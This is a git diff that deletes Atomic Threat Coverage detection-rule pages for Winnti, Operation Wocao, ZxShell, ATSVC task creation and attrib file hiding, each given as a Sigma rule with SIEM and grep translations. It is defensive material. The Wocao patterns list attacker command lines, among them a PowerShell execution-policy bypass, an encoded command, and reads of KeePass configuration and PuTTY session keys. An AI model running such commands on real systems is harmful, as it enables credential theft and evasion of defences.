-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3121461b-5aa0-4a41-b910-66d25524edbb <<EOF
-{
-  "metadata": {
-    "title": "Winnti Malware HK University Campaign",
-    "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.g0044",
-      "attack.t1574.002"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:(*C\\:\\\\Windows\\\\Temp* OR *\\\\hpqhvind.exe*) AND winlog.event_data.Image.keyword:C\\:\\\\ProgramData\\\\DRM*) OR (winlog.event_data.ParentImage.keyword:C\\:\\\\ProgramData\\\\DRM* AND winlog.event_data.Image.keyword:*\\\\wmplayer.exe) OR (winlog.event_data.ParentImage.keyword:*\\\\Test.exe AND winlog.event_data.Image.keyword:*\\\\wmplayer.exe) OR winlog.event_data.Image:\"C\\:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe\" OR (winlog.event_data.ParentImage.keyword:C\\:\\\\ProgramData\\\\DRM\\\\Windows* AND winlog.event_data.Image.keyword:*\\\\SearchFilterHost.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:(*C\\:\\\\Windows\\\\Temp* OR *\\\\hpqhvind.exe*) AND winlog.event_data.Image.keyword:C\\:\\\\ProgramData\\\\DRM*) OR (winlog.event_data.ParentImage.keyword:C\\:\\\\ProgramData\\\\DRM* AND winlog.event_data.Image.keyword:*\\\\wmplayer.exe) OR (winlog.event_data.ParentImage.keyword:*\\\\Test.exe AND winlog.event_data.Image.keyword:*\\\\wmplayer.exe) OR winlog.event_data.Image:\"C\\:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe\" OR (winlog.event_data.ParentImage.keyword:C\\:\\\\ProgramData\\\\DRM\\\\Windows* AND winlog.event_data.Image.keyword:*\\\\SearchFilterHost.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Winnti Malware HK University Campaign'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:(*C\:\\Windows\\Temp* *\\hpqhvind.exe*) AND Image.keyword:C\:\\ProgramData\\DRM*) OR (ParentImage.keyword:C\:\\ProgramData\\DRM* AND Image.keyword:*\\wmplayer.exe) OR (ParentImage.keyword:*\\Test.exe AND Image.keyword:*\\wmplayer.exe) OR Image:"C\:\\ProgramData\\DRM\\CLR\\CLR.exe" OR (ParentImage.keyword:C\:\\ProgramData\\DRM\\Windows* AND Image.keyword:*\\SearchFilterHost.exe))
-```
-
-
-### splunk
-    
-```
-(((ParentImage="*C:\\Windows\\Temp*" OR ParentImage="*\\hpqhvind.exe*") Image="C:\\ProgramData\\DRM*") OR (ParentImage="C:\\ProgramData\\DRM*" Image="*\\wmplayer.exe") OR (ParentImage="*\\Test.exe" Image="*\\wmplayer.exe") OR Image="C:\\ProgramData\\DRM\\CLR\\CLR.exe" OR (ParentImage="C:\\ProgramData\\DRM\\Windows*" Image="*\\SearchFilterHost.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((ParentImage IN ["*C:\\Windows\\Temp*", "*\\hpqhvind.exe*"] Image="C:\\ProgramData\\DRM*") OR (ParentImage="C:\\ProgramData\\DRM*" Image="*\\wmplayer.exe") OR (ParentImage="*\\Test.exe" Image="*\\wmplayer.exe") OR Image="C:\\ProgramData\\DRM\\CLR\\CLR.exe" OR (ParentImage="C:\\ProgramData\\DRM\\Windows*" Image="*\\SearchFilterHost.exe")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*C:\Windows\Temp.*|.*.*\hpqhvind\.exe.*))(?=.*C:\ProgramData\DRM.*))|.*(?:.*(?=.*C:\ProgramData\DRM.*)(?=.*.*\wmplayer\.exe))|.*(?:.*(?=.*.*\Test\.exe)(?=.*.*\wmplayer\.exe))|.*C:\ProgramData\DRM\CLR\CLR\.exe|.*(?:.*(?=.*C:\ProgramData\DRM\Windows.*)(?=.*.*\SearchFilterHost\.exe))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_wocao.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_wocao.md
deleted file mode 100644
index 40ff92c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_wocao.md
+++ /dev/null
@@ -1,266 +0,0 @@
-| Title                    | Operation Wocao Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects activity mentioned in Operation Wocao report |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrators that use checkadmin.exe tool to enumerate local administrators</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/](https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/)</li><li>[https://twitter.com/SBousseaden/status/1207671369963646976](https://twitter.com/SBousseaden/status/1207671369963646976)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Operation Wocao Activity
-id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
-author: Florian Roth
-status: experimental
-description: Detects activity mentioned in Operation Wocao report
-references:
-    - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
-    - https://twitter.com/SBousseaden/status/1207671369963646976
-date: 2019/12/20
-falsepositives:
-    - Administrators that use checkadmin.exe tool to enumerate local administrators
-level: high
----
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4799
-        GroupName: 'Administrators'
-        ProcessName: '*\checkadmin.exe'
-    condition: selection
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains: 
-            - 'checkadmin.exe 127.0.0.1 -all'
-            - 'netsh advfirewall firewall add rule name=powershell dir=in'
-            - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1'
-            - '/tn win32times /f'
-            - 'create win32times binPath='
-            - '\c$\windows\system32\devmgr.dll'
-            - ' -exec bypass -enc JgAg'
-            - 'type *keepass\KeePass.config.xml'
-            - 'iie.exe iie.txt'
-            - 'reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\'
-    condition: selection
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4799" -and $_.message -match "GroupName.*Administrators" -and $_.message -match "ProcessName.*.*\\checkadmin.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*checkadmin.exe 127.0.0.1 -all.*" -or $_.message -match "CommandLine.*.*netsh advfirewall firewall add rule name=powershell dir=in.*" -or $_.message -match "CommandLine.*.*cmd /c powershell.exe -ep bypass -file c:\\s.ps1.*" -or $_.message -match "CommandLine.*.*/tn win32times /f.*" -or $_.message -match "CommandLine.*.*create win32times binPath=.*" -or $_.message -match "CommandLine.*.*\\c$\\windows\\system32\\devmgr.dll.*" -or $_.message -match "CommandLine.*.* -exec bypass -enc JgAg.*" -or $_.message -match "CommandLine.*.*type .*keepass\\KeePass.config.xml.*" -or $_.message -match "CommandLine.*.*iie.exe iie.txt.*" -or $_.message -match "CommandLine.*.*reg query HKEY_CURRENT_USER\\Software\\.*\\PuTTY\\Sessions\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4799" AND winlog.event_data.GroupName:"Administrators" AND winlog.event_data.ProcessName.keyword:*\\checkadmin.exe)
-winlog.event_data.CommandLine.keyword:(*checkadmin.exe\ 127.0.0.1\ \-all* OR *netsh\ advfirewall\ firewall\ add\ rule\ name\=powershell\ dir\=in* OR *cmd\ \/c\ powershell.exe\ \-ep\ bypass\ \-file\ c\:\\s.ps1* OR *\/tn\ win32times\ \/f* OR *create\ win32times\ binPath\=* OR *\\c$\\windows\\system32\\devmgr.dll* OR *\ \-exec\ bypass\ \-enc\ JgAg* OR *type\ *keepass\\KeePass.config.xml* OR *iie.exe\ iie.txt* OR *reg\ query\ HKEY_CURRENT_USER\\Software\\*\\PuTTY\\Sessions\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/74ad4314-482e-4c3e-b237-3f7ed3b9ca8d <<EOF
-{
-  "metadata": {
-    "title": "Operation Wocao Activity",
-    "description": "Detects activity mentioned in Operation Wocao report",
-    "tags": "",
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4799\" AND winlog.event_data.GroupName:\"Administrators\" AND winlog.event_data.ProcessName.keyword:*\\\\checkadmin.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4799\" AND winlog.event_data.GroupName:\"Administrators\" AND winlog.event_data.ProcessName.keyword:*\\\\checkadmin.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Operation Wocao Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/74ad4314-482e-4c3e-b237-3f7ed3b9ca8d-2 <<EOF
-{
-  "metadata": {
-    "title": "Operation Wocao Activity",
-    "description": "Detects activity mentioned in Operation Wocao report",
-    "tags": "",
-    "query": "winlog.event_data.CommandLine.keyword:(*checkadmin.exe\\ 127.0.0.1\\ \\-all* OR *netsh\\ advfirewall\\ firewall\\ add\\ rule\\ name\\=powershell\\ dir\\=in* OR *cmd\\ \\/c\\ powershell.exe\\ \\-ep\\ bypass\\ \\-file\\ c\\:\\\\s.ps1* OR *\\/tn\\ win32times\\ \\/f* OR *create\\ win32times\\ binPath\\=* OR *\\\\c$\\\\windows\\\\system32\\\\devmgr.dll* OR *\\ \\-exec\\ bypass\\ \\-enc\\ JgAg* OR *type\\ *keepass\\\\KeePass.config.xml* OR *iie.exe\\ iie.txt* OR *reg\\ query\\ HKEY_CURRENT_USER\\\\Software\\\\*\\\\PuTTY\\\\Sessions\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*checkadmin.exe\\ 127.0.0.1\\ \\-all* OR *netsh\\ advfirewall\\ firewall\\ add\\ rule\\ name\\=powershell\\ dir\\=in* OR *cmd\\ \\/c\\ powershell.exe\\ \\-ep\\ bypass\\ \\-file\\ c\\:\\\\s.ps1* OR *\\/tn\\ win32times\\ \\/f* OR *create\\ win32times\\ binPath\\=* OR *\\\\c$\\\\windows\\\\system32\\\\devmgr.dll* OR *\\ \\-exec\\ bypass\\ \\-enc\\ JgAg* OR *type\\ *keepass\\\\KeePass.config.xml* OR *iie.exe\\ iie.txt* OR *reg\\ query\\ HKEY_CURRENT_USER\\\\Software\\\\*\\\\PuTTY\\\\Sessions\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Operation Wocao Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4799" AND GroupName:"Administrators" AND ProcessName.keyword:*\\checkadmin.exe)
-CommandLine.keyword:(*checkadmin.exe 127.0.0.1 \-all* *netsh advfirewall firewall add rule name=powershell dir=in* *cmd \/c powershell.exe \-ep bypass \-file c\:\\s.ps1* *\/tn win32times \/f* *create win32times binPath=* *\\c$\\windows\\system32\\devmgr.dll* * \-exec bypass \-enc JgAg* *type *keepass\\KeePass.config.xml* *iie.exe iie.txt* *reg query HKEY_CURRENT_USER\\Software\\*\\PuTTY\\Sessions\\*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4799" GroupName="Administrators" ProcessName="*\\checkadmin.exe")
-(CommandLine="*checkadmin.exe 127.0.0.1 -all*" OR CommandLine="*netsh advfirewall firewall add rule name=powershell dir=in*" OR CommandLine="*cmd /c powershell.exe -ep bypass -file c:\\s.ps1*" OR CommandLine="*/tn win32times /f*" OR CommandLine="*create win32times binPath=*" OR CommandLine="*\\c$\\windows\\system32\\devmgr.dll*" OR CommandLine="* -exec bypass -enc JgAg*" OR CommandLine="*type *keepass\\KeePass.config.xml*" OR CommandLine="*iie.exe iie.txt*" OR CommandLine="*reg query HKEY_CURRENT_USER\\Software\\*\\PuTTY\\Sessions\\*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4799" group_name="Administrators" ProcessName="*\\checkadmin.exe")
-(event_id="1" CommandLine IN ["*checkadmin.exe 127.0.0.1 -all*", "*netsh advfirewall firewall add rule name=powershell dir=in*", "*cmd /c powershell.exe -ep bypass -file c:\\s.ps1*", "*/tn win32times /f*", "*create win32times binPath=*", "*\\c$\\windows\\system32\\devmgr.dll*", "* -exec bypass -enc JgAg*", "*type *keepass\\KeePass.config.xml*", "*iie.exe iie.txt*", "*reg query HKEY_CURRENT_USER\\Software\\*\\PuTTY\\Sessions\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4799)(?=.*Administrators)(?=.*.*\checkadmin\.exe))'
-grep -P '^(?:.*.*checkadmin\.exe 127\.0\.0\.1 -all.*|.*.*netsh advfirewall firewall add rule name=powershell dir=in.*|.*.*cmd /c powershell\.exe -ep bypass -file c:\s\.ps1.*|.*.*/tn win32times /f.*|.*.*create win32times binPath=.*|.*.*\c\$\windows\system32\devmgr\.dll.*|.*.* -exec bypass -enc JgAg.*|.*.*type .*keepass\KeePass\.config\.xml.*|.*.*iie\.exe iie\.txt.*|.*.*reg query HKEY_CURRENT_USER\Software\\.*\PuTTY\Sessions\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_zxshell.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_zxshell.md
deleted file mode 100644
index ea653aa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_zxshell.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | ZxShell Malware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a ZxShell start by the called and well-known function name |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100](https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0001</li><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: ZxShell Malware
-id: f0b70adb-0075-43b0-9745-e82a1c608fcc
-description: Detects a ZxShell start by the called and well-known function name
-author: Florian Roth
-date: 2017/07/20
-references:
-    - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
-tags:
-    - attack.g0001
-    - attack.execution
-    - attack.t1059
-    - attack.defense_evasion
-    - attack.t1085
-    - attack.t1218.011
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Command:
-            - 'rundll32.exe *,zxFunction*'
-            - 'rundll32.exe *,RemoteDiskXXXXX'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Command.*rundll32.exe .*,zxFunction.*" -or $_.message -match "Command.*rundll32.exe .*,RemoteDiskXXXXX")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-Command.keyword:(rundll32.exe\ *,zxFunction* OR rundll32.exe\ *,RemoteDiskXXXXX)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f0b70adb-0075-43b0-9745-e82a1c608fcc <<EOF
-{
-  "metadata": {
-    "title": "ZxShell Malware",
-    "description": "Detects a ZxShell start by the called and well-known function name",
-    "tags": [
-      "attack.g0001",
-      "attack.execution",
-      "attack.t1059",
-      "attack.defense_evasion",
-      "attack.t1085",
-      "attack.t1218.011"
-    ],
-    "query": "Command.keyword:(rundll32.exe\\ *,zxFunction* OR rundll32.exe\\ *,RemoteDiskXXXXX)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "Command.keyword:(rundll32.exe\\ *,zxFunction* OR rundll32.exe\\ *,RemoteDiskXXXXX)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'ZxShell Malware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Command.keyword:(rundll32.exe *,zxFunction* rundll32.exe *,RemoteDiskXXXXX)
-```
-
-
-### splunk
-    
-```
-(Command="rundll32.exe *,zxFunction*" OR Command="rundll32.exe *,RemoteDiskXXXXX") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Command IN ["rundll32.exe *,zxFunction*", "rundll32.exe *,RemoteDiskXXXXX"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*rundll32\.exe .*,zxFunction.*|.*rundll32\.exe .*,RemoteDiskXXXXX)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_atsvc_task.md b/Atomic_Threat_Coverage/Detection_Rules/win_atsvc_task.md
deleted file mode 100644
index c179f53..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_atsvc_task.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Remote Task Creation via ATSVC Named Pipe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects remote task creation via at.exe or API interacting with ATSVC namedpipe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>pentesting</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html](https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-| Other Tags           | <ul><li>car.2013-05-004</li><li>car.2015-04-001</li><li>attack.t1053.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Remote Task Creation via ATSVC Named Pipe
-id: f6de6525-4509-495a-8a82-1f8b0ed73a00
-description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
-author: Samir Bousseaden
-date: 2019/04/03
-references:
-    - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
-tags:
-    - attack.lateral_movement
-    - attack.persistence
-    - attack.t1053
-    - car.2013-05-004
-    - car.2015-04-001
-    - attack.t1053.002
-logsource:
-    product: windows
-    service: security
-    description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
-detection:
-    selection:
-        EventID: 5145
-        ShareName: \\*\IPC$
-        RelativeTargetName: atsvc
-        Accesses: '*WriteData*'
-    condition: selection
-falsepositives:
-    - pentesting
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\IPC$" -and $_.message -match "RelativeTargetName.*atsvc" -and $_.message -match "Accesses.*.*WriteData.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\IPC$ AND RelativeTargetName:"atsvc" AND Accesses.keyword:*WriteData*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f6de6525-4509-495a-8a82-1f8b0ed73a00 <<EOF
-{
-  "metadata": {
-    "title": "Remote Task Creation via ATSVC Named Pipe",
-    "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.persistence",
-      "attack.t1053",
-      "car.2013-05-004",
-      "car.2015-04-001",
-      "attack.t1053.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName:\"atsvc\" AND Accesses.keyword:*WriteData*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName:\"atsvc\" AND Accesses.keyword:*WriteData*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Remote Task Creation via ATSVC Named Pipe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5145" AND ShareName.keyword:\\*\\IPC$ AND RelativeTargetName:"atsvc" AND Accesses.keyword:*WriteData*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5145" ShareName="\\*\\IPC$" RelativeTargetName="atsvc" Accesses="*WriteData*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5145" ShareName="\\*\\IPC$" RelativeTargetName="atsvc" Accesses="*WriteData*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5145)(?=.*\\.*\IPC\$)(?=.*atsvc)(?=.*.*WriteData.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_attrib_hiding_files.md b/Atomic_Threat_Coverage/Detection_Rules/win_attrib_hiding_files.md
deleted file mode 100644
index aa9c260..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_attrib_hiding_files.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Hiding Files with Attrib.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects usage of attrib.exe to hide files from users. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1158: Hidden Files and Directories](https://attack.mitre.org/techniques/T1158)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>igfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)</li><li>msiexec.exe hiding desktop.ini</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Sami Ruohonen |
-| Other Tags           | <ul><li>attack.t1564.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Hiding Files with Attrib.exe
